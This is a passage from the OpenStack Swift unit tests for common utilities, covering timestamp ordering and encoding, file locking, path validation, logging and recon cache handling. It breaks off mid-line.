'1402444821.52589_0000000000000004', '1402444920.62589_0000000000000004', '1402444821.62589_000000000000000a', '1402444821.72589_000000000000000a', '1402444920.62589_0000000000000002', '1402444820.62589_0000000000000002', '1402444820.62589_000000000000000a', '1402444820.62590_0000000000000004', '1402444920.62589_000000000000000a', '1402444820.62590_0000000000000002', '1402444821.52589_0000000000000002', '1402444821.52589_0000000000000000', '1402444920.62589', '1402444821.62589_0000000000000004', '1402444821.72589_0000000000000001', '1402444820.62590', '1402444820.62590_0000000000000001', '1402444820.62589_0000000000000004', '1402444821.72589_0000000000000000', '1402444821.52589_000000000000000a', '1402444821.72589_0000000000000004', '1402444821.62589', '1402444821.52589_0000000000000001', '1402444821.62589_0000000000000001', '1402444821.62589_0000000000000002', '1402444821.72589_0000000000000002', '1402444820.62589', '1402444920.62589_0000000000000001'] expected = [ '1402444820.62589', '1402444820.62589_0000000000000001', '1402444820.62589_0000000000000002', '1402444820.62589_0000000000000004', '1402444820.62589_000000000000000a', '1402444820.62590', '1402444820.62590_0000000000000001', '1402444820.62590_0000000000000002', '1402444820.62590_0000000000000004', '1402444820.62590_000000000000000a', '1402444821.52589', '1402444821.52589_0000000000000001', '1402444821.52589_0000000000000002', '1402444821.52589_0000000000000004', '1402444821.52589_000000000000000a', '1402444821.62589', '1402444821.62589_0000000000000001', '1402444821.62589_0000000000000002', '1402444821.62589_0000000000000004', '1402444821.62589_000000000000000a', '1402444821.72589', '1402444821.72589_0000000000000001', '1402444821.72589_0000000000000002', '1402444821.72589_0000000000000004', '1402444821.72589_000000000000000a', '1402444920.62589', '1402444920.62589_0000000000000001', '1402444920.62589_0000000000000002', '1402444920.62589_0000000000000004', '1402444920.62589_000000000000000a', ] # less visual version """ now = time.time() given = [ utils.Timestamp(now + i, offset=offset).internal for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0) for offset in (0, 1, 2, 4, 10) ] expected = [t for t in given] random.shuffle(given) """ self.assertEqual(len(given), len(expected)) # sanity timestamps = [utils.Timestamp(t) for t in given] # our expected values don't include insignificant offsets with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False): self.assertEqual( [t.internal for t in sorted(timestamps)], expected) # string sorting works as well self.assertEqual( sorted([t.internal for t in timestamps]), expected) def test_hashable(self): ts_0 = utils.Timestamp('1402444821.72589') ts_0_also = utils.Timestamp('1402444821.72589') self.assertEqual(ts_0, ts_0_also) # sanity self.assertEqual(hash(ts_0), hash(ts_0_also)) d = {ts_0: 'whatever'} self.assertIn(ts_0, d) # sanity self.assertIn(ts_0_also, d) def test_out_of_range_comparisons(self): now = utils.Timestamp.now() def check_is_later(val): self.assertTrue(now != val) self.assertFalse(now == val) self.assertTrue(now <= val) self.assertTrue(now < val) self.assertTrue(val > now) self.assertTrue(val >= now) check_is_later(1e30) check_is_later(1579753284000) # someone gave us ms instead of s! check_is_later('1579753284000') check_is_later(b'1e15') check_is_later(u'1.e+10_f') def check_is_earlier(val): self.assertTrue(now != val) self.assertFalse(now == val) self.assertTrue(now >= val) self.assertTrue(now > val) self.assertTrue(val < now) self.assertTrue(val <= now) check_is_earlier(-1) check_is_earlier(-0.1) check_is_earlier('-9999999') check_is_earlier(b'-9999.999') check_is_earlier(u'-1234_5678') def test_inversion(self): ts = utils.Timestamp(0) self.assertIsInstance(~ts, utils.Timestamp) self.assertEqual((~ts).internal, '9999999999.99999') ts = utils.Timestamp(123456.789) self.assertIsInstance(~ts, utils.Timestamp) self.assertEqual(ts.internal, '0000123456.78900') self.assertEqual((~ts).internal, '9999876543.21099') timestamps = sorted(utils.Timestamp(random.random() * 1e10) for _ in range(20)) self.assertEqual([x.internal for x in timestamps], sorted(x.internal for x in timestamps)) self.assertEqual([(~x).internal for x in reversed(timestamps)], sorted((~x).internal for x in timestamps)) ts = utils.Timestamp.now() self.assertGreater(~ts, ts) # NB: will break around 2128 ts = utils.Timestamp.now(offset=1) with self.assertRaises(ValueError) as caught: ~ts self.assertEqual(caught.exception.args[0], 'Cannot invert timestamps with offsets') class TestTimestampEncoding(unittest.TestCase): def setUp(self): t0 = utils.Timestamp(0.0) t1 = utils.Timestamp(997.9996) t2 = utils.Timestamp(999) t3 = utils.Timestamp(1000, 24) t4 = utils.Timestamp(1001) t5 = utils.Timestamp(1002.00040) # encodings that are expected when explicit = False self.non_explicit_encodings = ( ('0000001000.00000_18', (t3, t3, t3)), ('0000001000.00000_18', (t3, t3, None)), ) # mappings that are expected when explicit = True self.explicit_encodings = ( ('0000001000.00000_18+0+0', (t3, t3, t3)), ('0000001000.00000_18+0', (t3, t3, None)), ) # mappings that are expected when explicit = True or False self.encodings = ( ('0000001000.00000_18+0+186a0', (t3, t3, t4)), ('0000001000.00000_18+186a0+186c8', (t3, t4, t5)), ('0000001000.00000_18-186a0+0', (t3, t2, t2)), ('0000001000.00000_18+0-186a0', (t3, t3, t2)), ('0000001000.00000_18-186a0-186c8', (t3, t2, t1)), ('0000001000.00000_18', (t3, None, None)), ('0000001000.00000_18+186a0', (t3, t4, None)), ('0000001000.00000_18-186a0', (t3, t2, None)), ('0000001000.00000_18', (t3, None, t1)), ('0000001000.00000_18-5f5e100', (t3, t0, None)), ('0000001000.00000_18+0-5f5e100', (t3, t3, t0)), ('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)), ) # decodings that are expected when explicit = False self.non_explicit_decodings = ( ('0000001000.00000_18', (t3, t3, t3)), ('0000001000.00000_18+186a0', (t3, t4, t4)), ('0000001000.00000_18-186a0', (t3, t2, t2)), ('0000001000.00000_18+186a0', (t3, t4, t4)), ('0000001000.00000_18-186a0', (t3, t2, t2)), ('0000001000.00000_18-5f5e100', (t3, t0, t0)), ) # decodings that are expected when explicit = True self.explicit_decodings = ( ('0000001000.00000_18+0+0', (t3, t3, t3)), ('0000001000.00000_18+0', (t3, t3, None)), ('0000001000.00000_18', (t3, None, None)), ('0000001000.00000_18+186a0', (t3, t4, None)), ('0000001000.00000_18-186a0', (t3, t2, None)), ('0000001000.00000_18-5f5e100', (t3, t0, None)), ) # decodings that are expected when explicit = True or False self.decodings = ( ('0000001000.00000_18+0+186a0', (t3, t3, t4)), ('0000001000.00000_18+186a0+186c8', (t3, t4, t5)), ('0000001000.00000_18-186a0+0', (t3, t2, t2)), ('0000001000.00000_18+0-186a0', (t3, t3, t2)), ('0000001000.00000_18-186a0-186c8', (t3, t2, t1)), ('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)), ) def _assertEqual(self, expected, actual, test): self.assertEqual(expected, actual, 'Got %s but expected %s for parameters %s' % (actual, expected, test)) def test_encoding(self): for test in self.explicit_encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], True) self._assertEqual(test[0], actual, test[1]) for test in self.non_explicit_encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], False) self._assertEqual(test[0], actual, test[1]) for explicit in (True, False): for test in self.encodings: actual = utils.encode_timestamps(test[1][0], test[1][1], test[1][2], explicit) self._assertEqual(test[0], actual, test[1]) def test_decoding(self): for test in self.explicit_decodings: actual = utils.decode_timestamps(test[0], True) self._assertEqual(test[1], actual, test[0]) for test in self.non_explicit_decodings: actual = utils.decode_timestamps(test[0], False) self._assertEqual(test[1], actual, test[0]) for explicit in (True, False): for test in self.decodings: actual = utils.decode_timestamps(test[0], explicit) self._assertEqual(test[1], actual, test[0]) class TestUtils(unittest.TestCase): """Tests for swift.common.utils """ def setUp(self): utils.HASH_PATH_SUFFIX = b'endcap' utils.HASH_PATH_PREFIX = b'startcap' def test_get_zero_indexed_base_string(self): self.assertEqual(utils.get_zero_indexed_base_string('something', 0), 'something') self.assertEqual(utils.get_zero_indexed_base_string('something', None), 'something') self.assertEqual(utils.get_zero_indexed_base_string('something', 1), 'something-1') self.assertRaises(ValueError, utils.get_zero_indexed_base_string, 'something', 'not_integer') @with_tempdir def test_lock_path(self, tmpdir): # 2 locks with limit=1 must fail success = False with utils.lock_path(tmpdir, 0.1): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1): success = True self.assertFalse(success) # 2 locks with limit=2 must succeed success = False with utils.lock_path(tmpdir, 0.1, limit=2): try: with utils.lock_path(tmpdir, 0.1, limit=2): success = True except LockTimeout as exc: self.fail('Unexpected exception %s' % exc) self.assertTrue(success) # 3 locks with limit=2 must fail success = False with utils.lock_path(tmpdir, 0.1, limit=2): with utils.lock_path(tmpdir, 0.1, limit=2): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1): success = True self.assertFalse(success) @with_tempdir def test_lock_path_invalid_limit(self, tmpdir): success = False with self.assertRaises(ValueError): with utils.lock_path(tmpdir, 0.1, limit=0): success = True self.assertFalse(success) with self.assertRaises(ValueError): with utils.lock_path(tmpdir, 0.1, limit=-1): success = True self.assertFalse(success) with self.assertRaises(TypeError): with utils.lock_path(tmpdir, 0.1, limit='1'): success = True self.assertFalse(success) with self.assertRaises(TypeError): with utils.lock_path(tmpdir, 0.1, limit=1.1): success = True self.assertFalse(success) @with_tempdir def test_lock_path_num_sleeps(self, tmpdir): num_short_calls = [0] exception_raised = [False] def my_sleep(to_sleep): if to_sleep == 0.01: num_short_calls[0] += 1 else: raise Exception('sleep time changed: %s' % to_sleep) try: with mock.patch('swift.common.utils.sleep', my_sleep): with utils.lock_path(tmpdir): with utils.lock_path(tmpdir): pass except Exception as e: exception_raised[0] = True self.assertTrue('sleep time changed' in str(e)) self.assertEqual(num_short_calls[0], 11) self.assertTrue(exception_raised[0]) @with_tempdir def test_lock_path_class(self, tmpdir): with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout): exc = None exc2 = None success = False try: with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout): success = True except ReplicationLockTimeout as err: exc = err except LockTimeout as err: exc2 = err self.assertTrue(exc is not None) self.assertTrue(exc2 is None) self.assertTrue(not success) exc = None exc2 = None success = False try: with utils.lock_path(tmpdir, 0.1): success = True except ReplicationLockTimeout as err: exc = err except LockTimeout as err: exc2 = err self.assertTrue(exc is None) self.assertTrue(exc2 is not None) self.assertTrue(not success) @with_tempdir def test_lock_path_name(self, tmpdir): # With default limit (1), can't take the same named lock twice success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with self.assertRaises(LockTimeout): with utils.lock_path(tmpdir, 0.1, name='foo'): success = True self.assertFalse(success) # With default limit (1), can take two differently named locks success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with utils.lock_path(tmpdir, 0.1, name='bar'): success = True self.assertTrue(success) # With default limit (1), can take a named lock and the default lock success = False with utils.lock_path(tmpdir, 0.1, name='foo'): with utils.lock_path(tmpdir, 0.1): success = True self.assertTrue(success) def test_normalize_timestamp(self): # Test swift.common.utils.normalize_timestamp self.assertEqual(utils.normalize_timestamp('1253327593.48174'), "1253327593.48174") self.assertEqual(utils.normalize_timestamp(1253327593.48174), "1253327593.48174") self.assertEqual(utils.normalize_timestamp('1253327593.48'), "1253327593.48000") self.assertEqual(utils.normalize_timestamp(1253327593.48), "1253327593.48000") self.assertEqual(utils.normalize_timestamp('253327593.48'), "0253327593.48000") self.assertEqual(utils.normalize_timestamp(253327593.48), "0253327593.48000") self.assertEqual(utils.normalize_timestamp('1253327593'), "1253327593.00000") self.assertEqual(utils.normalize_timestamp(1253327593), "1253327593.00000") self.assertRaises(ValueError, utils.normalize_timestamp, '') self.assertRaises(ValueError, utils.normalize_timestamp, 'abc') def test_normalize_delete_at_timestamp(self): self.assertEqual( utils.normalize_delete_at_timestamp(1253327593), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp(1253327593.67890), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp('1253327593'), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp('1253327593.67890'), '1253327593') self.assertEqual( utils.normalize_delete_at_timestamp(-1253327593), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp(-1253327593.67890), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp('-1253327593'), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp('-1253327593.67890'), '0000000000') self.assertEqual( utils.normalize_delete_at_timestamp(71253327593), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp(71253327593.67890), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp('71253327593'), '9999999999') self.assertEqual( utils.normalize_delete_at_timestamp('71253327593.67890'), '9999999999') self.assertRaises(ValueError, utils.normalize_timestamp, '') self.assertRaises(ValueError, utils.normalize_timestamp, 'abc') def test_last_modified_date_to_timestamp(self): expectations = { '1970-01-01T00:00:00.000000': 0.0, '2014-02-28T23:22:36.698390': 1393629756.698390, '2011-03-19T04:03:00.604554': 1300507380.604554, } for last_modified, ts in expectations.items(): real = utils.last_modified_date_to_timestamp(last_modified) self.assertEqual(real, ts, "failed for %s" % last_modified) def test_last_modified_date_to_timestamp_when_system_not_UTC(self): try: old_tz = os.environ.get('TZ') # Western Argentina Summer Time. Found in glibc manual; this # timezone always has a non-zero offset from UTC, so this test is # always meaningful. os.environ['TZ'] = 'WART4WARST,J1/0,J365/25' self.assertEqual(utils.last_modified_date_to_timestamp( '1970-01-01T00:00:00.000000'), 0.0) finally: if old_tz is not None: os.environ['TZ'] = old_tz else: os.environ.pop('TZ') def test_backwards(self): # Test swift.common.utils.backward # The lines are designed so that the function would encounter # all of the boundary conditions and typical conditions. # Block boundaries are marked with '<>' characters blocksize = 25 lines = [b'123456789x12345678><123456789\n', # block larger than rest b'123456789x123>\n', # block ends just before \n character b'123423456789\n', b'123456789x\n', # block ends at the end of line b'<123456789x123456789x123\n', b'<6789x123\n', # block ends at the beginning of the line b'6789x1234\n', b'1234><234\n', # block ends typically in the middle of line b'123456789x123456789\n'] with TemporaryFile() as f: for line in lines: f.write(line) count = len(lines) - 1 for line in utils.backward(f, blocksize): self.assertEqual(line, lines[count].split(b'\n')[0]) count -= 1 # Empty file case with TemporaryFile('r') as f: self.assertEqual([], list(utils.backward(f))) def test_mkdirs(self): testdir_base = mkdtemp() testroot = os.path.join(testdir_base, 'mkdirs') try: self.assertTrue(not os.path.exists(testroot)) utils.mkdirs(testroot) self.assertTrue(os.path.exists(testroot)) utils.mkdirs(testroot) self.assertTrue(os.path.exists(testroot)) rmtree(testroot, ignore_errors=1) testdir = os.path.join(testroot, 'one/two/three') self.assertTrue(not os.path.exists(testdir)) utils.mkdirs(testdir) self.assertTrue(os.path.exists(testdir)) utils.mkdirs(testdir) self.assertTrue(os.path.exists(testdir)) rmtree(testroot, ignore_errors=1) open(testroot, 'wb').close() self.assertTrue(not os.path.exists(testdir)) self.assertRaises(OSError, utils.mkdirs, testdir) os.unlink(testroot) finally: rmtree(testdir_base) def test_split_path(self): # Test swift.common.utils.split_account_path self.assertRaises(ValueError, utils.split_path, '') self.assertRaises(ValueError, utils.split_path, '/') self.assertRaises(ValueError, utils.split_path, '//') self.assertEqual(utils.split_path('/a'), ['a']) self.assertRaises(ValueError, utils.split_path, '//a') self.assertEqual(utils.split_path('/a/'), ['a']) self.assertRaises(ValueError, utils.split_path, '/a/c') self.assertRaises(ValueError, utils.split_path, '//c') self.assertRaises(ValueError, utils.split_path, '/a/c/') self.assertRaises(ValueError, utils.split_path, '/a//') self.assertRaises(ValueError, utils.split_path, '/a', 2) self.assertRaises(ValueError, utils.split_path, '/a', 2, 3) self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True) self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c']) self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o']) self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3) self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True), ['a', 'c', 'o/r']) self.assertEqual(utils.split_path('/a/c', 2, 3, True), ['a', 'c', None]) self.assertRaises(ValueError, utils.split_path, '/a', 5, 4) self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c']) self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', '']) try: utils.split_path('o\nn e', 2) except ValueError as err: self.assertEqual(str(err), 'Invalid path: o%0An%20e') try: utils.split_path('o\nn e', 2, 3, True) except ValueError as err: self.assertEqual(str(err), 'Invalid path: o%0An%20e') def test_validate_device_partition(self): # Test swift.common.utils.validate_device_partition utils.validate_device_partition('foo', 'bar') self.assertRaises(ValueError, utils.validate_device_partition, '', '') self.assertRaises(ValueError, utils.validate_device_partition, '', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '') self.assertRaises(ValueError, utils.validate_device_partition, 'foo/bar', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', 'foo/bar') self.assertRaises(ValueError, utils.validate_device_partition, '.', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, '..', 'foo') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '.') self.assertRaises(ValueError, utils.validate_device_partition, 'foo', '..') try: utils.validate_device_partition('o\nn e', 'foo') except ValueError as err: self.assertEqual(str(err), 'Invalid device: o%0An%20e') try: utils.validate_device_partition('foo', 'o\nn e') except ValueError as err: self.assertEqual(str(err), 'Invalid partition: o%0An%20e') def test_NullLogger(self): # Test swift.common.utils.NullLogger sio = StringIO() nl = utils.NullLogger() nl.write('test') self.assertEqual(sio.getvalue(), '') def test_LoggerFileObject(self): orig_stdout = sys.stdout orig_stderr = sys.stderr sio = StringIO() handler = logging.StreamHandler(sio) logger = logging.getLogger() logger.addHandler(handler) lfo_stdout = utils.LoggerFileObject(logger) lfo_stderr = utils.LoggerFileObject(logger, 'STDERR') print('test1') self.assertEqual(sio.getvalue(), '') sys.stdout = lfo_stdout print('test2') self.assertEqual(sio.getvalue(), 'STDOUT: test2\n') sys.stderr = lfo_stderr print('test4', file=sys.stderr) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n') sys.stdout = orig_stdout print('test5') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n') print('test6', file=sys.stderr) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\n') sys.stderr = orig_stderr print('test8') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\n') lfo_stdout.writelines(['a', 'b', 'c']) self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\n') lfo_stdout.close() lfo_stderr.close() lfo_stdout.write('d') self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n') lfo_stdout.flush() self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n' 'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n') for lfo in (lfo_stdout, lfo_stderr): got_exc = False try: for line in lfo: pass except Exception: got_exc = True self.assertTrue(got_exc) got_exc = False try: for line in lfo: pass except Exception: got_exc = True self.assertTrue(got_exc) self.assertRaises(IOError, lfo.read) self.assertRaises(IOError, lfo.read, 1024) self.assertRaises(IOError, lfo.readline) self.assertRaises(IOError, lfo.readline, 1024) lfo.tell() def test_LoggerFileObject_recursion(self): crashy_calls = [0] class CrashyLogger(logging.Handler): def emit(self, record): crashy_calls[0] += 1 try: # Pretend to be trying to send to syslog, but syslogd is # dead. We need the raise here to set sys.exc_info. raise socket.error(errno.ENOTCONN, "This is an ex-syslog") except socket.error: self.handleError(record) logger = logging.getLogger() logger.addHandler(CrashyLogger()) # Set up some real file descriptors for stdio. If you run # nosetests with "-s", you already have real files there, but # otherwise they're StringIO objects. # # In any case, since capture_stdio() closes sys.stdin and friends, # we'd want to set up some sacrificial files so as to not goof up # the testrunner. new_stdin = open(os.devnull, 'r+b') new_stdout = open(os.devnull, 'w+b') new_stderr = open(os.devnull, 'w+b') with contextlib.closing(new_stdin), contextlib.closing(new_stdout), \ contextlib.closing(new_stderr): # logging.raiseExceptions is set to False in test/__init__.py, but # is True in Swift daemons, and the error doesn't manifest without # it. with mock.patch('sys.stdin', new_stdin), \ mock.patch('sys.stdout', new_stdout), \ mock.patch('sys.stderr', new_stderr), \ mock.patch.object(logging, 'raiseExceptions', True): # Note: since stdio is hooked up to /dev/null in here, using # pdb is basically impossible. Sorry about that. utils.capture_stdio(logger) logger.info("I like ham") self.assertGreater(crashy_calls[0], 1) def test_parse_options(self): # Get a file that is definitely on disk with NamedTemporaryFile() as f: conf_file = f.name conf, options = utils.parse_options(test_args=[conf_file]) self.assertEqual(conf, conf_file) # assert defaults self.assertEqual(options['verbose'], False) self.assertNotIn('once', options) # assert verbose as option conf, options = utils.parse_options(test_args=[conf_file, '-v']) self.assertEqual(options['verbose'], True) # check once option conf, options = utils.parse_options(test_args=[conf_file], once=True) self.assertEqual(options['once'], False) test_args = [conf_file, '--once'] conf, options = utils.parse_options(test_args=test_args, once=True) self.assertEqual(options['once'], True) # check options as arg parsing test_args = [conf_file, 'once', 'plugin_name', 'verbose'] conf, options = utils.parse_options(test_args=test_args, once=True) self.assertEqual(options['verbose'], True) self.assertEqual(options['once'], True) self.assertEqual(options['extra_args'], ['plugin_name']) def test_parse_options_errors(self): orig_stdout = sys.stdout orig_stderr = sys.stderr stdo = StringIO() stde = StringIO() utils.sys.stdout = stdo utils.sys.stderr = stde self.assertRaises(SystemExit, utils.parse_options, once=True, test_args=[]) self.assertTrue('missing config' in stdo.getvalue()) # verify conf file must exist, context manager will delete temp file with NamedTemporaryFile() as f: conf_file = f.name self.assertRaises(SystemExit, utils.parse_options, once=True, test_args=[conf_file]) self.assertTrue('unable to locate' in stdo.getvalue()) # reset stdio utils.sys.stdout = orig_stdout utils.sys.stderr = orig_stderr def test_dump_recon_cache(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') logger = utils.get_logger(None, 'server', log_route='server') try: submit_dict = {'key0': 99, 'key1': {'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(submit_dict, file_dict) # Use a nested entry submit_dict = {'key0': 101, 'key1': {'key2': {'value1': 1, 'value2': 2}}} expect_dict = {'key0': 101, 'key1': {'key2': {'value1': 1, 'value2': 2}, 'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # nested dict items are not sticky submit_dict = {'key1': {'key2': {'value3': 3}}} expect_dict = {'key0': 101, 'key1': {'key2': {'value3': 3}, 'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # cached entries are sticky submit_dict = {} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # nested dicts can be erased... submit_dict = {'key1': {'key2': {}}} expect_dict = {'key0': 101, 'key1': {'value1': 1, 'value2': 2}} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # ... and erasure is idempotent utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # top level dicts can be erased... submit_dict = {'key1': {}} expect_dict = {'key0': 101} utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) # ... and erasure is idempotent utils.dump_recon_cache(submit_dict, testcache_file, logger) with open(testcache_file) as fd: file_dict = json.loads(fd.readline()) self.assertEqual(expect_dict, file_dict) finally: rmtree(testdir_base) def test_dump_recon_cache_set_owner(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') logger = utils.get_logger(None, 'server', log_route='server') try: submit_dict = {'key1': {'value1': 1, 'value2': 2}} _ret = lambda: None _ret.pw_uid = 100 _mock_getpwnam = MagicMock(return_value=_ret) _mock_chown = mock.Mock() with patch('os.chown', _mock_chown), \ patch('pwd.getpwnam', _mock_getpwnam): utils.dump_recon_cache(submit_dict, testcache_file, logger, set_owner="swift") _mock_getpwnam.assert_called_once_with("swift") self.assertEqual(_mock_chown.call_args[0][1], 100) finally: rmtree(testdir_base) def test_dump_recon_cache_permission_denied(self): testdir_base = mkdtemp() testcache_file = os.path.join(testdir_base, 'cache.recon') class MockLogger(object): def __init__(self): self._excs = [] def exception(self, message): _junk, exc, _junk = sys.exc_info() self._excs.append(exc) logger = MockLogger() try: submit_dict = {'key1': {'value1': 1, 'value2': 2}} with mock.patch( 'swift.common.utils.NamedTemporaryFile', side_effect=IOError(13, 'Permission Denied')): utils.dump_recon_cache(submit_dict, testcache_file, logger) self.assertIsInstance(logger._excs[0], IOError) finally: rmtree(testdir_base) def test_load_recon_cache(self): stub_data = {'test': 'foo'} with NamedTemporaryFile() as f: f.write(json.dumps(stub_data).encode("utf-8")) f.flush() self.assertEqual(stub_data, utils.load_recon_cache(f.name)) # missing files are treated as empty self.assertFalse(os.path.exists(f.name)) # sanity self.assertEqual({}, utils.load_recon_cache(f.name)) # Corrupt files are treated as empty. We could crash and make an # operator fix the corrupt file, but they'll "fix" it with "rm -f # /var/cache/swift/*.recon", so let's just do it for them. with NamedTemporaryFile() as f: f.write(b"{not [valid (json") f.flush() self.assertEqual({}, utils.load_recon_cache(f.name)) def test_get_logger(self): sio = StringIO() logger = logging.getLogger('server') logger.addHandler(logging.StreamHandler(sio)) logger = utils.get_logger(None, 'server', log_route='server') logger.warning('test1') self.assertEqual(sio.getvalue(), 'test1\n') logger.debug('test2') self.assertEqual(sio.getvalue(), 'test1\n') logger = utils.get_logger({'log_level': 'DEBUG'}, 'server', log_route='server') logger.debug('test3') self.assertEqual(sio.getvalue(), 'test1\ntest3\n') # Doesn't really test that the log facility is truly being used all the # way to syslog; but exercises the code. logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server', log_route='server') logger.warning('test4') self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\n') # make sure debug doesn't log by default logger.debug('test5') self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\n') # make sure notice lvl logs by default logger.notice('test6') self.assertEqual(sio.getvalue(), 'test1\ntest3\ntest4\ntest6\n') def test_get_logger_sysloghandler_plumbing(self): orig_sysloghandler = utils.ThreadSafeSysLogHandler syslog_handler_args = [] def syslog_handler_catcher(*args, **kwargs): syslog_handler_args.append((args, kwargs)) return orig_sysloghandler(*args, **kwargs) syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0 syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3 # Some versions of python perform host resolution while initializing # the handler. See https://bugs.python.org/issue30378 orig_getaddrinfo = socket.getaddrinfo def fake_getaddrinfo(host, *args): return orig_getaddrinfo('localhost', *args) with mock.patch.object(utils, 'ThreadSafeSysLogHandler', syslog_handler_catcher), \ mock.patch.object(socket, 'getaddrinfo', fake_getaddrinfo): utils.get_logger({ 'log_facility': 'LOG_LOCAL3', }, 'server', log_route='server') expected_args = [((), {'address': '/dev/log', 'facility': orig_sysloghandler.LOG_LOCAL3})] if not os.path.exists('/dev/log') or \ os.path.isfile('/dev/log') or \ os.path.isdir('/dev/log'): # Since socket on OSX is in /var/run/syslog, there will be # a fallback to UDP. expected_args.append( ((), {'facility': orig_sysloghandler.LOG_LOCAL3})) self.assertEqual(expected_args, syslog_handler_args) syslog_handler_args = [] utils.get_logger({ 'log_facility': 'LOG_LOCAL3', 'log_address': '/foo/bar', }, 'server', log_route='server') self.assertEqual( ((), {'address': '/foo/bar', 'facility': orig_sysloghandler.LOG_LOCAL3}), syslog_handler_args[0]) # Using UDP with default port syslog_handler_args = [] utils.get_logger({ 'log_udp_host': 'syslog.funtimes.com', }, 'server', log_route='server') self.assertEqual([ ((), {'address': ('syslog.funtimes.com', logging.handlers.SYSLOG_UDP_PORT), 'facility': orig_sysloghandler.LOG_LOCAL0})], syslog_handler_args) # Using UDP with non-default port syslog_handler_args = [] utils.get_logger({ 'log_udp_host': 'syslog.funtimes.com', 'log_udp_port': '2123', }, 'server', log_route='server') self.assertEqual([ ((), {'address': ('syslog.funtimes.com', 2123), 'facility': orig_sysloghandler.LOG_LOCAL0})], syslog_handler_args) @reset_logger_state def test_clean_logger_exception(self): # setup stream logging sio = StringIO() logger = utils.get_logger(None) handler = logging.StreamHandler(sio) logger.logger.addHandler(handler) def strip_value(sio): sio.seek(0) v = sio.getvalue() sio.truncate(0) return v def log_exception(exc): try: raise exc except (Exception, Timeout): logger.exception('blah') try: # establish base case self.assertEqual(strip_value(sio), '') logger.info('test') self.assertEqual(strip_value(sio), 'test\n') self.assertEqual(strip_value(sio), '') logger.info('test') logger.info('test') self.assertEqual(strip_value(sio), 'test\ntest\n') self.assertEqual(strip_value(sio), '') # test OSError for en in (errno.EIO, errno.ENOSPC): log_exception(OSError(en, 'my %s error message' % en)) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertIn('my %s error message' % en, log_msg) # unfiltered log_exception(OSError()) self.assertTrue('Traceback' in strip_value(sio)) # test socket.error log_exception(socket.error(errno.ECONNREFUSED, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('errno.ECONNREFUSED message test', log_msg) self.assertIn('Connection refused', log_msg) log_exception(socket.error(errno.EHOSTUNREACH, 'my error message')) log_msg = strip_value(sio) self.assertNotIn('Traceback', log_msg) self.assertNotIn('my error message', log_msg) self.assertIn('Host 